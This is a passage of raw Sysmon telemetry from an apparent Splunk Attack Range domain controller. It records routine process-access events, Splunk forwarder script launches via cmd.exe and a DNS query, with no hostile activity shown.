10341000x80000000000000002143Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.574{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002142Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.574{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002141Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.574{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002140Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.574{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002139Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.574{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002138Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.574{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B6-5F84-5E00-000000007F01}3604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002137Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.574{5D479F2C-16B1-5F84-3000-000000007F01}26163792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B6-5F84-5E00-000000007F01}3604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002136Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.577{5D479F2C-16B6-5F84-5E00-000000007F01}3604C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002135Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.406{5D479F2C-16B1-5F84-2D00-000000007F01}2504WIN-DC-35740600fe80::64fd:4c36:9a5d:fb14;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 10341000x80000000000000002134Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.464{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B6-5F84-5D00-000000007F01}3660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002133Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.464{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002132Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.464{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002131Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.464{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002130Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.464{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002129Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.464{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002128Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.464{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002127Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.464{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002126Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.464{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002125Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.464{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002124Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.464{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B6-5F84-5D00-000000007F01}3660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002123Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.464{5D479F2C-16B1-5F84-3000-000000007F01}26163792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B6-5F84-5D00-000000007F01}3660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002122Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.467{5D479F2C-16B6-5F84-5D00-000000007F01}3660C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002121Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002120Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002119Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002118Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002117Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 